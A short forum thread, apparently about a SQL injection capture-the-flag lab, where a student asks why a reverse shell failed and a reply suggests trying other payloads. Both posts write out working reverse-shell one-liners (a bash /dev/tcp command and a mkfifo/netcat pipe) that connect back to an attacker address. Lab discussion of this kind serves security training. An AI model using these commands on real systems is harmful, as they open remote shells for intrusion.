Skills Assessment - SQL Injection Fundamentals - why the flag is outside of the root directory?

for some reason, the flag exists in /(spoiler).txt, why? is this intentional?
I’m asking this because I tried to create a reverse shell, but I failed.
If it is intentional, I am not supposed to create the reverse shell. (though the question says ‘find a flag in the / root directory of the file system.’)

“bash -c ‘bash -i >& /dev/tcp/10.10.14.15/1234 0>&1’”
I url encoded this and the browser hungs, so I think it worked. but my shell didn’t change from nc -lvnp 1234. why?
I checked tun0 using ifconfig.

I’m curious why reverse shell didn’t work.

Hi,

I’m not sure I’ve done that exact machine, however, I can assure you that is better to try at least 3 different types of commands. Every machine is special and works differently. Therefore, every shell injection should be tailored.

Use this website. This is my favorite format:
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 192.168.0.1 3089 >/tmp/f